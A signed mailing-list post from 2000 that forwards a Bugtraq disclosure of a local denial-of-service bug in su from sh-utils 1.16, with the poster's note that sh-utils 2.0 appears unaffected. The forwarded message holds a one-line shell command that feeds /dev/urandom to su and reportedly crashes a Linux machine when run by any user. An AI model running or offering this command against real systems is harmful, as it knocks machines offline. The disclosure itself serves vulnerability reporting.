security probs with su (sh-utils 1.16)
-----BEGIN PGP SIGNED MESSAGE-----
Has anyone else seen this? i tested it with the latest shellutils
from the frozen dist, and it appears to work. It should also be noted
that i tested this on my alpha box (running RedHat 6.1) and it didn't do
anything except give an error message. The version included with RedHat
6.1 is sh-utils 2.0. i haven't looked yet but, i'm willing to bet that
this was already noticed and fixed and people (including distro
maintainers) just need to upgrade.
- ----- Forwarded message from Javor Ninov <javor@multigroup-bg.com> -----
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Date: Fri, 24 Mar 2000 18:42:03 +0200
Reply-To: Javor Ninov <javor@multigroup-bg.com>
From: Javor Ninov <javor@multigroup-bg.com>
Subject: Local Linux Crash
X-To: bugtraq <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Tested on SlackWare 7.0 2.2.14
After short time this will crash Linux box:
su `cat /dev/urandom` > /dev/null |< su `cat /dev/urandom`&
for a better efect start it several times :-))
This can be done be any regular user !
- ----- End forwarded message -----
Nathan Paul Simons
http://www.nmt.edu/~npsimons/
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBONxCzFegz5xsVo19AQFopAP/QJcY73ssk/wktkHjTP7om1arvlIYM4Vt
L5m8zxj5qRJxdYhWEEE2nbT0mvZFUmkyaojMMkgOrl0FZwzUZNiiV0YHkKnvc5YL
BkXKS+lvS0GmpqABLotijwxmumYRlP53DUGVL2Af6CEUmN7HnlaABEW5LtThd0Cq
uSGrKYlOVOg=
=AsQD
-----END PGP SIGNATURE-----
Reply to: